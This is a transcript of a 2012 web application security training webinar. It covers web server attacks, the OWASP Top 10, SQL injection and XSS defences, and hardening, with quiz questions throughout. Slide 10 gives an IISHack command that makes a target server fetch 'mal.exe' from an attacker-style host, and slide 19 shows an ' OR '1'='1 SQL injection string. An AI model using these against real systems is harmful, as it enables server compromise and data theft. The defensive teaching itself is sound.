ncircle webinar: get your black belt
DESCRIPTION
Get Your Black Belt in Web Application SecurityTRANSCRIPT
![Page 1: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/1.jpg)
© 2012 nCircle. All rights reserved.
Get Your Black Belt in Web Application Security26 April 2012
![Page 2: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/2.jpg)
2 © 2012 nCircle. All rights reserved.
Web Server and Web Applications Security
![Page 3: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/3.jpg)
3 © 2012 nCircle. All rights reserved.
Why Web Servers and Web Applications are hard to Defend
Why is attacking a web server or web applications one of the easiest attack methods?
– On the perimeter– Accessible by anyone on the Internet– Need to balance functionality with security– Port 80 and port 443 (can’t just block them)– Lack of security awareness of many
web developers– High level of traffic. Hard to distinguish an
attack from high volumes of legitimate traffic
![Page 4: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/4.jpg)
4 © 2012 nCircle. All rights reserved.
Typical Attack Steps against a Web Server
1. Reconnaissance (passive)
2. Scanning and enumeration (active)
3. Gaining Access (exploit)
4. Escalation of privilege
5. Maintain access
6. Covering tracks and placing backdoors
![Page 5: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/5.jpg)
5 © 2012 nCircle. All rights reserved.
Two Methods of Attack: The Web Server and Web Applications
• Web Server Attacks– Vulnerabilities in the web server or web server
configuration• Examples: Buffer Overflows, Traversals
• Web Application Attacks– Vulnerabilities in web applications
• Command Injection• XSS (Cross Site Scripting)
![Page 6: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/6.jpg)
6 © 2012 nCircle. All rights reserved.
Ichi (one)
With respect to defending against web attacks what is problem with port 80 with respect to security?
a. It is the default TFTP port
b. It can be closed
c. It is not a well-known port
d. It can’t be blocked
Difficulty: Easy/Medium
![Page 7: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/7.jpg)
7 © 2012 nCircle. All rights reserved.
Ni (two)
For an attack to work on a web server or a web application what does it need to have?
a. An exploit
b. A risk
c. A vulnerability
d. A configuration
Difficulty: Easy/Medium
![Page 8: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/8.jpg)
8 © 2012 nCircle. All rights reserved.
Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.
![Page 9: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/9.jpg)
9 © 2012 nCircle. All rights reserved.
Web Server Attacks
![Page 10: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/10.jpg)
10 © 2012 nCircle. All rights reserved.
Buffer Overflow Attack
A buffer overflow attack allows an attacker to overwrite code in the program’s execution path and thus take control of the program to execute the attacker’s code.
Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)
Example:
IISHack.exe Exploits the IIS http daemon buffer. Below is a sample:
c:\ iishack www.WebserverA.com 80www.hackserver.com/mal.exe
![Page 11: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/11.jpg)
11 © 2012 nCircle. All rights reserved.
Web Server File System Traversal Attacks
• Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.
• By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.
• Attack is initiated by inserting special characters in URLs, for example, ../ sequence.
• Encoding can be used to bypass Web server filtering.
![Page 12: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/12.jpg)
12 © 2012 nCircle. All rights reserved.
San (three)
Which one of the following is NOT one of the typical attacks used against a web server like Apache?
a. ARP poisoning
b. Buffer overflow
c. Source disclosure
d. File system traversal
Difficulty: Easy/Medium
![Page 13: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/13.jpg)
13 © 2012 nCircle. All rights reserved.
Shi (four)
A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?
a. Buffer boundary
b. File system traversal
c. Encryption
d. File overflow
Difficulty: Easy/Medium
![Page 14: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/14.jpg)
14 © 2012 nCircle. All rights reserved.
Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.
![Page 15: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/15.jpg)
15 © 2012 nCircle. All rights reserved.
Web Application Attacks
![Page 16: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/16.jpg)
16 © 2012 nCircle. All rights reserved.
OWASP Top 10 Categories
A1-Injection
A2-Cross Site Scripting (XSS)
A3-Broken Authentication/Session Management
A4-Insecure Direct Object References
A5-Cross Site Request Forgery (CSRF)
A6-Security Misconfiguration
A7-Insecure Cryptographic Storage
A8-Failure to Restrict URL Access
A9-Insufficient Transport Layer Encryption
A10-Unvalidated Redirects and Forwards
OWASP Top 10 (2010 List) – www.owasp.org
![Page 17: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/17.jpg)
17 © 2012 nCircle. All rights reserved.
Injection (Command Injection – OWASP A1)
• Occurs when untrusted data is sent to a command interpreter as part of a command or query.
• Cleverly formed data can trick the command interpreter to performing unintended commands or revealing unintended information
• Examples of command injection:– SQL Injection– Script Injection– Any web application that accepts input is potentially vulnerable
to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program
![Page 18: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/18.jpg)
18 © 2012 nCircle. All rights reserved.
SQL Injection (Valid Data)
As an example the user enters Jill and Brown into two input fields on a web page
The program takes this input into the CustID variable and dynamically creates the query string :
‘SELECT * FROM accounts WHERE customerID =Jill_Brown’
The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown’s record as expected.
![Page 19: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/19.jpg)
19 © 2012 nCircle. All rights reserved.
SQL Injection (Invalid Data)
The user enters Jane and Doe’ OR ‘1’=‘1 on the web page
The program takes this input and dynamically creates the query string :
‘SELECT * FROM accounts WHERE customerID =Jane_Doe’ OR ‘1’=‘1’
The program send this SQL query to the SQL database and it then retrieves ALL of the records in the database accounts table – NOT as expected
![Page 20: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/20.jpg)
20 © 2012 nCircle. All rights reserved.
Defenses Against SQL Injection
• Prepared Statements (parameterized queries)• Stored Procedures• Escaping all user supplied input• Least privilege• White list input validation
Reference: OWASP SQL Injection Prevention Cheat
Sheet (www.owasp.org)
![Page 21: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/21.jpg)
21 © 2012 nCircle. All rights reserved.
Cross Site Scripting (XSS – OWASP A2)
Untrusted data
• Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into the otherwise benign and trusted web sites. Injection occurs usually by inserting untrusted data in a user’s browser via a web page request.
![Page 22: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/22.jpg)
22 © 2012 nCircle. All rights reserved.
Defenses Against XSS
Primary defense: Escaping untrusted data
“Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.
Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations
Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content
Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations
Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
![Page 23: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/23.jpg)
23 © 2012 nCircle. All rights reserved.
Broken Authentication and Session Management(OWASP A3)
• Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity.
![Page 24: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/24.jpg)
24 © 2012 nCircle. All rights reserved.
Defenses Against Broken Authentication and Session Management
• Secure management of session identifiers– Do not put session identifiers in the URL– Session IDs should have a timeout feature
• Do not allow the login process to execute from an unencrypted page
• Password Change Controls• Password use / strength / storage
• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
![Page 25: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/25.jpg)
25 © 2012 nCircle. All rights reserved.
Go (five)
An web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?
a. Sequence infiltration
b. SQL injection
c. Cookie poisoning
d. Hidden parameter exploit
Difficulty: Easy/Medium
![Page 26: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/26.jpg)
26 © 2012 nCircle. All rights reserved.
Roku (six)
What is one of the defenses against SQL Injection?
a. Least Privilege
b. Black list input validation
c. Sanitization
d. Proxy manipulation
Difficulty: Easy/Medium
![Page 27: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/27.jpg)
27 © 2012 nCircle. All rights reserved.
Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.
![Page 28: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/28.jpg)
28 © 2012 nCircle. All rights reserved.
Web Server and Web ApplicationDefense Tools
![Page 29: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/29.jpg)
29 © 2012 nCircle. All rights reserved.
Web Server and Application Defense Tools (1 of 2)
• Scanning and mapping tools• Ping, Nping, Nmap, Amap, SuperScan, …
• Vulnerability and Web vulnerability scanners• Nikto, Wikto, Nessus, w3af, IP360, WebInspect,
Sentinel, WebApp360, Cenzic, Fortify, …
• Web proxy tools• WebScarab, Paros Proxy, Burp Proxy, …
• Web mapping/ripping tools• Black Widow, Wget, skipfish, …
• Communication/data transfer tools• Ncat, telnet, ftp, ….
• Exploits, Exploit Kits, and Exploit Frameworks• Program for a specific exploit• Pen Test frameworks: Metasploit, Core Impact, CANVAS
![Page 30: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/30.jpg)
30 © 2012 nCircle. All rights reserved.
• Password cracking tools• John the Ripper, Cain and Abel, PRTK, ophcrack, …
• Web Source Code examination tools:• Instant Source, Firebug, ….
• SQL Injection Tools• BSQL Hacker, The Mole, sqlmap,
Pangolin, …
Web Server and Application Defense Tools (2 of 2)
![Page 31: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/31.jpg)
31 © 2012 nCircle. All rights reserved.
Network Defense Tools (Protecting the Web Server)
• Routers• Firewalls (network layer)• Web Application Firewalls (application layer)• Web Application Proxies• Honeypots/Honeynets• Logging• Intrusion Detection/Prevention System (IDS/IPS)• Host-based Intrusion Detection (HIDS), e.g. file integrity
detection• Backups• Computer Forensic Tools
![Page 32: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/32.jpg)
32 © 2012 nCircle. All rights reserved.
Web Server Protection
• Protect the Web Server • Vulnerability Assessment • Harden the Web Server
– Host (OS) – Web Server – Web Services
• Logging • Backups and recovery
![Page 33: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/33.jpg)
33 © 2012 nCircle. All rights reserved.
Place the Web Sever in an Untrusted Zone
![Page 34: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/34.jpg)
34 © 2012 nCircle. All rights reserved.
Security Harden the Web Server (1 of 2)
• Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)
• Host (OS) hardening
• Web Server hardening– Use tools like IIS Lockdown and URLscan– Harden each service you offer on your Web Server– Disable / remove anything you don’t use or need: accounts,
ports, services, accounts, plug-ins– Configuration settings– Permissions
![Page 35: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/35.jpg)
35 © 2012 nCircle. All rights reserved.
Security Harden the Web Server (2 of 2)
• Authentication and Access Control – File and directory permissions– Account password and lockout policies
• Logging and Audit Policies
• Vulnerability and Compliance Assessments– Vulnerability scanner– Web application vulnerability scanner– Configuration scanner– Audits for compliance assessments – Penetration testing / manual testing
![Page 36: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/36.jpg)
36 © 2012 nCircle. All rights reserved.
Web Server Attack Countermeasures
• Buffer Overflow– Can be mitigated by conducting frequent scans for server
vulnerabilities
– Prompting acquiring and installing patches and service packs
– Implementing effective firewalls
– Applying web configuration lockdown utilities
• File System Traversal– Promptly apply patches and updates to the web server
– Restrict privileges to executable programs such as cmd.exe
– Set file and directory permissions
– Locate the system software on a different disk drive from the web site software and content directory.
![Page 37: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/37.jpg)
37 © 2012 nCircle. All rights reserved.
Shichi (seven)
Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?
a. Banner grabbing
b. Defeating authentication
c. Scanning
d. Password Cracking
Difficulty: Medium/Hard
![Page 38: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/38.jpg)
38 © 2012 nCircle. All rights reserved.
Hachi (eight)
What is a good tool to help harden an IIS web server? (choose the best answer)
a. Cain and Abel
b. URLscan
c. ncat
d. WebScarab
Difficulty: Medium/Hard
![Page 39: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/39.jpg)
39 © 2012 nCircle. All rights reserved.
Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan
![Page 40: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/40.jpg)
40 © 2012 nCircle. All rights reserved.
Resources
• OWASP (Open Web Application Security Project) www.owasp.org
• NIST (National Institute of Standards and Technology) www.nist.gov
• SANS
www.sans.org • Web Application Security Consortium (WASC)
www.webappsec.org • SecTools.org
http://sectools.org
![Page 41: nCircle Webinar: Get your Black Belt](https://reader033.vdocument.in/reader033/viewer/2022052505/554dd984b4c905d10e8b4f89/html5/thumbnails/41.jpg)
41 © 2012 nCircle. All rights reserved.
Questions?